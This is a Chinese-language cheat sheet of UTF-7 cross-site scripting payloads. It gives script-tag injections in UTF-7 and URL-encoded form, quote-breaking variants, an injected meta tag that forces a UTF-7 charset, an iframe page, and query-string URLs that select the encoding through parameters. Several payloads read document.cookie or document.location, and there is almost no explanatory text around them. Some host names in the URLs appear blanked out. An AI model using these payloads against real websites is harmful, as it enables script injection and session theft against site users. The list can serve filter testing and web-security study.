UTF-7 XSS 常见利用方法
1、基本样式
<script>alert(31337)</script>
+ADw-script+AD4-alert(31337)+ADw-/script+AD4-
<script>alert(document.cookie)</script>
+ADw-script+AD4-alert(document.cookie)+ADw-/script+AD4-
+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
<script>alert(document.location)</script>
2、URL encoded 转换后的样式
%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
<script>alert(document.location)</script>
3、利用引号’和”
+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
"><script>alert(document.location)</script><"
4、URL编码,利用引号’和”
%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
"><script>alert(document.location)</script><"
5、注入伪造的<meta>标签
+ADw-/title+AD4APA-meta http-equiv+AD0-'content-type' content+AD0-'text/html+ADs-charset+AD0-utf-7'+AD4-
</title><meta http-equiv='content-type' content='text/html;charset=utf-7'>
6、利用UTF-7 iframe
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-7">
</head>
<body>
<iframe src="http://www. /NOTFOUND/%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-"></iframe>
</body>
</html>
7、charset通过参数设定的
http://www.badguest.cn /?q=%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&oe=Windows-31J
http://www. /?q=%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&oe=CP932
http://www./?q=%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&eo=MS932
http://www. /?q=%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&cs=jis
http://www./?q=%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&charset=utf8
http://www. /?q=%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&enc=sjis